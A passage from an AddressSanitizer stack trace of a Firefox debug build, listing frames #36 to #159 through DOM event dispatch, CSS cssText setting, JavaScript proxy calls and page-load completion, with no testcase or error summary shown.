    #36 0x7f934eb723e9 in PrepareAndDispatch /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122:0
    #37 0x7f934eb71276 in
    #38 0x7f934c9a204c in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, mozilla::dom::CallbackObjectHolder&lt;mozilla::dom::EventListener, nsIDOMEventListener&gt; const&amp;, nsIDOMEvent*, mozilla::dom::EventTarget*, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventListenerManager.cpp:937:0
    #39 0x7f934c9a27b1 in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventListenerManager.cpp:1008:0
    #40 0x7f934c999e2b in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, bool, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:201:0
    #41 0x7f934c999795 in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, nsDispatchingCallback*, bool, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:350:0
    #42 0x7f934c99b212 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:632:0
    #43 0x7f934c99ba6b in nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:695:0
    #44 0x7f934c80143e in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsINode.cpp:1148:0
    #45 0x7f934c94e1a0 in nsAsyncDOMEvent::Run() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsAsyncDOMEvent.cpp:48:0
    #46 0x7f934c708c3b in nsContentUtils::RemoveScriptBlocker() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsContentUtils.cpp:4803:0
    #47 0x7f934c77480b in nsDocument::EndUpdate(unsigned int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsDocument.cpp:4392:0
    #48 0x7f934cbd9bff in nsHTMLDocument::EndUpdate(unsigned int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/html/document/src/nsHTMLDocument.cpp:2545:0
    #49 0x7f934c47d1c1 in mozAutoDocConditionalContentUpdateBatch::~mozAutoDocConditionalContentUpdateBatch() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/layout/style/../../content/base/src/mozAutoDocUpdate.h:81:0
    #50 0x7f934c47c8d0 in nsDOMCSSDeclaration::SetCssText(nsAString_internal const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/layout/style/nsDOMCSSDeclaration.cpp:108:0
    #51 0x7f934e3d3029 in nsICSSDeclaration::SetCssText(nsAString_internal const&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/layout/style/nsICSSDeclaration.h:105:0
    #52 0x7f934e3d2d4b in mozilla::dom::CSSStyleDeclarationBinding::set_cssText(JSContext*, JS::Handle&lt;JSObject*&gt;, nsICSSDeclaration*, JSJitSetterCallArgs) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/dom/bindings/CSSStyleDeclarationBinding.cpp:43:0
    #53 0x7f934e3d1d75 in mozilla::dom::CSSStyleDeclarationBinding::genericSetter(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/dom/bindings/CSSStyleDeclarationBinding.cpp:424:0
    #54 0x7f934fdf5c48 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxtinlines.h:349:0
    #55 0x7f934fdf5395 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:381:0
    #56 0x7f934fdf61f6 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:434:0
    #57 0x7f934fdf729c in js::InvokeGetterOrSetter(JSContext*, JSObject*, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:505:0
    #58 0x7f93500fd3aa in js::CallSetter(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, int (*)(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, int, JS::MutableHandle&lt;JS::Value&gt;), unsigned int, unsigned int, int, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxtinlines.h:452:0
    #59 0x7f93501409f6 in js::BaseProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:240:0
    #60 0x7f935015b600 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:2544:0
    #61 0x7f935015f29e in proxy_SetGeneric(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:2856:0
    #62 0x7f93500e8a68 in JSObject::nonNativeSetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsobj.cpp:1657:0
    #63 0x7f934fdae1b1 in JSObject::setGeneric(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsobjinlines.h:83:0
    #64 0x7f9350145a72 in js::DirectProxyHandler::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:611:0
    #65 0x7f9350282514 in js::CrossCompartmentWrapper::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jswrapper.cpp:323:0
    #66 0x7f935015b600 in js::Proxy::set(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:2544:0
    #67 0x7f935015f29e in proxy_SetGeneric(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:2856:0
    #68 0x7f93500e8a68 in JSObject::nonNativeSetProperty(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsobj.cpp:1657:0
    #69 0x7f934fdae1b1 in JSObject::setGeneric(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;, int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsobjinlines.h:83:0
    #70 0x7f934fe026e5 in js::SetPropertyOperation(JSContext*, unsigned char*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter-inl.h:365:0
    #71 0x7f934fdead7a in
    #72 0x7f934fde3adc in js::RunScript(JSContext*, js::StackFrame*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:345:0
    #73 0x7f934fdf5423 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:401:0
    #74 0x7f934fdf61f6 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:434:0
    #75 0x7f93501436f1 in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:479:0
    #76 0x7f93502836bb in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jswrapper.cpp:447:0
    #77 0x7f935015c1de in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:2616:0
    #78 0x7f9350160d00 in proxy_Call(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:3180:0
    #79 0x7f934fdf5c48 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxtinlines.h:349:0
    #80 0x7f934fdf5395 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:381:0
    #81 0x7f934fdf61f6 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:434:0
    #82 0x7f934ff79461 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsapi.cpp:5885:0
    #83 0x7f934d7b730c in nsXPCWrappedJSClass::CallMethod(nsXPCWrappedJS*, unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCWrappedJSClass.cpp:1437:0
    #84 0x7f934d7aa1b8 in nsXPCWrappedJS::CallMethod(unsigned short, XPTMethodDescriptor const*, nsXPTCMiniVariant*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/xpconnect/src/XPCWrappedJS.cpp:589:0
    #85 0x7f934eb723e9 in PrepareAndDispatch /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/xpcom/reflect/xptcall/src/md/unix/xptcstubs_x86_64_linux.cpp:122:0
    #86 0x7f934eb71276 in
    #87 0x7f934c9a204c in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, mozilla::dom::CallbackObjectHolder&lt;mozilla::dom::EventListener, nsIDOMEventListener&gt; const&amp;, nsIDOMEvent*, mozilla::dom::EventTarget*, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventListenerManager.cpp:937:0
    #88 0x7f934c9a27b1 in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventListenerManager.cpp:1008:0
    #89 0x7f934c999e2b in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, bool, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:201:0
    #90 0x7f934c999795 in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, nsDispatchingCallback*, bool, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:350:0
    #91 0x7f934c99b212 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:632:0
    #92 0x7f934c99ba6b in nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:695:0
    #93 0x7f934c80143e in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsINode.cpp:1148:0
    #94 0x7f934c94e1a0 in nsAsyncDOMEvent::Run() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsAsyncDOMEvent.cpp:48:0
    #95 0x7f934c708c3b in nsContentUtils::RemoveScriptBlocker() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsContentUtils.cpp:4803:0
    #96 0x7f934c77480b in nsDocument::EndUpdate(unsigned int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsDocument.cpp:4392:0
    #97 0x7f934cbd9bff in nsHTMLDocument::EndUpdate(unsigned int) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/html/document/src/nsHTMLDocument.cpp:2545:0
    #98 0x7f934c2dbb6f in mozAutoDocUpdate::~mozAutoDocUpdate() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/xul/templates/src/../../../base/src/mozAutoDocUpdate.h:38:0
    #99 0x7f934c803f35 in nsINode::ReplaceOrInsertBefore(bool, nsINode*, nsINode*, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsINode.cpp:2000:0
    #100 0x7f934e68e486 in mozilla::dom::NodeBinding::appendChild(JSContext*, JS::Handle&lt;JSObject*&gt;, nsINode*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/dom/bindings/NodeBinding.cpp:579:0
    #101 0x7f934e68a07d in mozilla::dom::NodeBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/dom/bindings/NodeBinding.cpp:1333:0
    #102 0x7f934fdf5c48 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxtinlines.h:349:0
    #103 0x7f934fdf5395 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:381:0
    #104 0x7f934fdf61f6 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:434:0
    #105 0x7f93501436f1 in js::DirectProxyHandler::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:479:0
    #106 0x7f93502836bb in js::CrossCompartmentWrapper::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jswrapper.cpp:447:0
    #107 0x7f935015c1de in js::Proxy::call(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:2616:0
    #108 0x7f9350160d00 in proxy_Call(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsproxy.cpp:3180:0
    #109 0x7f934fdf5c48 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxtinlines.h:349:0
    #110 0x7f934fdf5395 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:381:0
    #111 0x7f934fdef7fa in
    #112 0x7f934fde3adc in js::RunScript(JSContext*, js::StackFrame*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:345:0
    #113 0x7f934fdf5423 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:401:0
    #114 0x7f934fdf61f6 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:434:0
    #115 0x7f934ff79461 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsapi.cpp:5885:0
    #116 0x7f934e474b67 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JSObject*&gt;, nsDOMEvent&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/dom/bindings/EventHandlerBinding.cpp:41:0
    #117 0x7f934d037253 in JS::Value mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, nsDOMEvent&amp;, mozilla::ErrorResult&amp;, mozilla::dom::CallbackObject::ExceptionHandling) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/../../../dist/include/mozilla/dom/EventHandlerBinding.h:58:0
    #118 0x7f934d035f2e in nsJSEventListener::HandleEvent(nsIDOMEvent*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/dom/src/events/nsJSEventListener.cpp:247:0
    #119 0x7f934c9a204c in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, mozilla::dom::CallbackObjectHolder&lt;mozilla::dom::EventListener, nsIDOMEventListener&gt; const&amp;, nsIDOMEvent*, mozilla::dom::EventTarget*, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventListenerManager.cpp:937:0
    #120 0x7f934c9a27b1 in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventListenerManager.cpp:1008:0
    #121 0x7f934c999e2b in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, bool, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:201:0
    #122 0x7f934c9995bb in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, nsDispatchingCallback*, bool, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:326:0
    #123 0x7f934c99b212 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:632:0
    #124 0x7f934c99ba6b in nsEventDispatcher::DispatchDOMEvent(nsISupports*, nsEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:695:0
    #125 0x7f934c80143e in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsINode.cpp:1148:0
    #126 0x7f934c814aac in mozilla::dom::EventTarget::DispatchEvent(nsDOMEvent&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsINode.cpp:2456:0
    #127 0x7f934e480fce in mozilla::dom::EventTargetBinding::dispatchEvent(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::EventTarget*, JSJitMethodCallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/dom/bindings/EventTargetBinding.cpp:242:0
    #128 0x7f934e480a5d in mozilla::dom::EventTargetBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/dom/bindings/EventTargetBinding.cpp:408:0
    #129 0x7f934fdf5c48 in js::CallJSNative(JSContext*, int (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jscntxtinlines.h:349:0
    #130 0x7f934fdf5395 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:381:0
    #131 0x7f934fdef7fa in
    #132 0x7f934fde3adc in js::RunScript(JSContext*, js::StackFrame*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:345:0
    #133 0x7f934fdf5423 in js::Invoke(JSContext*, JS::CallArgs, js::MaybeConstruct) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:401:0
    #134 0x7f934fdf61f6 in js::Invoke(JSContext*, JS::Value const&amp;, JS::Value const&amp;, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/vm/Interpreter.cpp:434:0
    #135 0x7f934ff79461 in JS_CallFunctionValue(JSContext*, JSObject*, JS::Value, unsigned int, JS::Value*, JS::Value*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/js/src/jsapi.cpp:5885:0
    #136 0x7f934e474b67 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JSObject*&gt;, nsDOMEvent&amp;, mozilla::ErrorResult&amp;) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/dom/bindings/EventHandlerBinding.cpp:41:0
    #137 0x7f934d037253 in JS::Value mozilla::dom::EventHandlerNonNull::Call&lt;nsISupports*&gt;(nsISupports* const&amp;, nsDOMEvent&amp;, mozilla::ErrorResult&amp;, mozilla::dom::CallbackObject::ExceptionHandling) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/../../../dist/include/mozilla/dom/EventHandlerBinding.h:58:0
    #138 0x7f934d035f2e in nsJSEventListener::HandleEvent(nsIDOMEvent*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/dom/src/events/nsJSEventListener.cpp:247:0
    #139 0x7f934c9a204c in nsEventListenerManager::HandleEventSubType(nsListenerStruct*, mozilla::dom::CallbackObjectHolder&lt;mozilla::dom::EventListener, nsIDOMEventListener&gt; const&amp;, nsIDOMEvent*, mozilla::dom::EventTarget*, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventListenerManager.cpp:937:0
    #140 0x7f934c9a27b1 in nsEventListenerManager::HandleEventInternal(nsPresContext*, nsEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventListenerManager.cpp:1008:0
    #141 0x7f934c999e2b in nsEventTargetChainItem::HandleEvent(nsEventChainPostVisitor&amp;, bool, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:201:0
    #142 0x7f934c9995bb in nsEventTargetChainItem::HandleEventTargetChain(nsEventChainPostVisitor&amp;, nsDispatchingCallback*, bool, nsCxPusher*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:326:0
    #143 0x7f934c99b212 in nsEventDispatcher::Dispatch(nsISupports*, nsPresContext*, nsEvent*, nsIDOMEvent*, nsEventStatus*, nsDispatchingCallback*, nsCOMArray&lt;mozilla::dom::EventTarget&gt;*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/events/src/nsEventDispatcher.cpp:632:0
    #144 0x7f934c1462b9 in nsDocumentViewer::LoadComplete(tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/layout/base/nsDocumentViewer.cpp:1035:0
    #145 0x7f934d8beed4 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/docshell/base/nsDocShell.cpp:6657:0
    #146 0x7f934d8bca0b in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/docshell/base/nsDocShell.cpp:6454:0
    #147 0x7f934d8bce5f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/docshell/base/nsDocShell.cpp:6461:0
    #148 0x7f934d8f7f95 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/uriloader/base/nsDocLoader.cpp:1323:0
    #149 0x7f934d8f769b in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/uriloader/base/nsDocLoader.cpp:865:0
    #150 0x7f934d8f5a12 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/uriloader/base/nsDocLoader.cpp:755:0
    #151 0x7f934d8f6eab in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/uriloader/base/nsDocLoader.cpp:639:0
    #152 0x7f934d8f73dc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/uriloader/base/nsDocLoader.cpp:643:0
    #153 0x7f934ba6585e in nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, tag_nsresult) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/netwerk/base/src/nsLoadGroup.cpp:684:0
    #154 0x7f934c78c544 in nsDocument::DoUnblockOnload() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsDocument.cpp:7953:0
    #155 0x7f934c78c2c1 in nsDocument::UnblockOnload(bool) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsDocument.cpp:7881:0
    #156 0x7f934c775c18 in nsDocument::DispatchContentLoadedEvents() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/content/base/src/nsDocument.cpp:4625:0
    #157 0x7f934c7aaa49 in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/../../../dist/include/nsThreadUtils.h:350:0
    #158 0x7f934eb3828b in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/xpcom/threads/nsThread.cpp:626:0
    #159 0x7f934ea84931 in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-cen-l64-dbg-asan-ntly-000000/build/obj-firefox/xpcom/build/nsThreadUtils.cpp:238:0
